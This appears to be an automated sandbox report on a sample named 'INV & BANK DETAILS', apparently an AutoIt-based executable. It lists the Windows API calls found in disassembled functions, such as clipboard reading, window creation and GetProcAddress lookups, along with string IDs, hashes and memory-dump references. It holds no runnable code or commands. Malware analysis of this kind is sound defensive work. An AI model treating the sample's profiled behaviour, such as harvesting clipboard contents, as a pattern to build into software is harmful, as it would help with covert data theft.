                                • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                APIs
                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                • CloseClipboard.USER32 ref: 0046DD0D
                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                • CloseClipboard.USER32 ref: 0046DD41
                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                • CloseClipboard.USER32 ref: 0046DD99
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                • String ID:
                                • API String ID: 15083398-0
                                • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                APIs
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • GetWindowRect.USER32(?,?), ref: 00471CF7
                                • GetClientRect.USER32(?,?), ref: 00471D05
                                • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                • GetClientRect.USER32(?,?), ref: 00471E8A
                                • GetStockObject.GDI32(00000011), ref: 00471EA6
                                • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                • String ID: @$AutoIt v3 GUI
                                • API String ID: 867697134-3359773793
                                • Opcode ID: f09f2a2b6cca380f9ede19f0122a88a3538efa9583e86f2b72b74e79f194809b
                                • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                • Opcode Fuzzy Hash: f09f2a2b6cca380f9ede19f0122a88a3538efa9583e86f2b72b74e79f194809b
                                • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                • API String ID: 1503153545-1459072770
                                • Opcode ID: 83765b9f55f09713808f06d0c449f1bfafbb30469e25804f018cc04f8550c6ec
                                • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                • Opcode Fuzzy Hash: 83765b9f55f09713808f06d0c449f1bfafbb30469e25804f018cc04f8550c6ec
                                • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __wcsicoll$__wcsnicmp
                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                • API String ID: 790654849-32604322
                                • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b138b5d80077f47550a94c6977eca8a0db71283c63b239a1866a5e270e527fd4
                                • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                • Opcode Fuzzy Hash: b138b5d80077f47550a94c6977eca8a0db71283c63b239a1866a5e270e527fd4
                                • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                APIs
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Window
                                • String ID: 0
                                • API String ID: 2353593579-4108050209
                                • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                APIs
                                • GetSysColor.USER32(0000000F), ref: 0044A05E
                                • GetClientRect.USER32(?,?), ref: 0044A0D1
                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                • GetWindowDC.USER32(?), ref: 0044A0F6
                                • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                • ReleaseDC.USER32(?,?), ref: 0044A11B
                                • GetSysColor.USER32(0000000F), ref: 0044A131
                                • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                • GetSysColor.USER32(0000000F), ref: 0044A14F
                                • GetSysColor.USER32(00000005), ref: 0044A15B
                                • GetWindowDC.USER32(?), ref: 0044A1BE
                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                • GetSysColor.USER32(00000008), ref: 0044A265
                                • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                • GetStockObject.GDI32(00000005), ref: 0044A28A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                • String ID:
                                • API String ID: 1744303182-0
                                • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                APIs
                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                • __mtterm.LIBCMT ref: 00417C34
                                  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                • __init_pointers.LIBCMT ref: 00417CE6
                                • __calloc_crt.LIBCMT ref: 00417D54
                                • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                • API String ID: 4163708885-3819984048
                                • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __wcsicoll$IconLoad
                                • String ID: blank$info$question$stop$warning
                                • API String ID: 2485277191-404129466
                                • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                APIs
                                • LoadIconW.USER32(?,00000063), ref: 0045464C
                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                • SetWindowTextW.USER32(?,?), ref: 00454678
                                • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                • GetWindowRect.USER32(?,?), ref: 004546F5
                                • SetWindowTextW.USER32(?,?), ref: 00454765
                                • GetDesktopWindow.USER32 ref: 0045476F
                                • GetWindowRect.USER32(00000000), ref: 00454776
                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                • GetClientRect.USER32(?,?), ref: 004547D2
                                • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                • String ID:
                                • API String ID: 3869813825-0
                                • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                APIs
                                • _wcslen.LIBCMT ref: 00464B28
                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                • _wcslen.LIBCMT ref: 00464C28
                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                • _wcslen.LIBCMT ref: 00464CBA
                                • _wcslen.LIBCMT ref: 00464CD0
                                • _wcslen.LIBCMT ref: 00464CEF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _wcslen$Directory$CurrentSystem
                                • String ID: D
                                • API String ID: 1914653954-2746444292
                                • Opcode ID: bb88b9e33802b8f959be53c6b132484157298b773cf762090a06ca1d35dd5c67
                                • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                • Opcode Fuzzy Hash: bb88b9e33802b8f959be53c6b132484157298b773cf762090a06ca1d35dd5c67
                                • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __wcsicoll
                                • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                • API String ID: 3832890014-4202584635
                                • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                APIs
                                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                • GetFocus.USER32 ref: 0046A0DD
                                • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessagePost$CtrlFocus
                                • String ID: 0
                                • API String ID: 1534620443-4108050209
                                • Opcode ID: 5424a9e8c615beb4ff65f855739771b25ef8df7c7451d22eb1c524710b74d8e0
                                • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                • Opcode Fuzzy Hash: 5424a9e8c615beb4ff65f855739771b25ef8df7c7451d22eb1c524710b74d8e0
                                • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                APIs
                                • DestroyWindow.USER32(?), ref: 004558E3
                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Window$CreateDestroy
                                • String ID: ,$tooltips_class32
                                • API String ID: 1109047481-3856767331
                                • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
